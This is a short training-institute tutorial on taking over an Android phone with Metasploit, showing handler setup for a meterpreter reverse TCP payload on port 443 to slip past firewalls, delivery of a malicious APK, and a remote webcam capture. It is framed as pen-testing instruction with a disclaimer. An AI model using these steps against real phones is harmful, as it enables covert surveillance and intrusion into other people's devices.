Ethical Hacking Institute Course in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Our tutorial for today is how to Hack Android Smartphone  using Metasploit in Kali Linux

what is metasploit ?
metasploit  Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

Attacker IP address: 192.168.8.94

Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (kali linux)

2. Android smartphone

We will use Metasploit payload framework to create exploit for this tutorial.

attacker IP address is 192.168.8.94

kali

 

prepare the handeler to handle incoming connection come from victim android phone in the playload we set the PORT 443 the reason using this port is because most firewall allow this connection and not treat the communication as malicious

Type msfconsole to go to Metasploit console.

kali2

kali3

#use exploit/multi/handler  ==> is for using metasploit handler

#set payload android/meterpreter/reverse_tcp ==> make sure the payload is the same

kali6

next step we need to configure the switch for the Metasploit payload

kali7

our handler already running and ready to recieve connection from the victim

now we gonna use apache server to send malicious apk file to my android phone

kali8

kali9

now the victime is installing the apk file

kali10

now we can exploit any thing in the victim phone for exemple we gonna take web camera shot

just with typing webcam_snap 2

kali12

kali13

as we can see here the webcam shot sorry its dark

hope you fount it usefull

Conclusion:

Don’t install APK’s from the unknown source.

www.extremehacking.org
Cyber Suraksha AbhiyanCEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNECertified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-IndiaEthical Hacking Course in Pune-India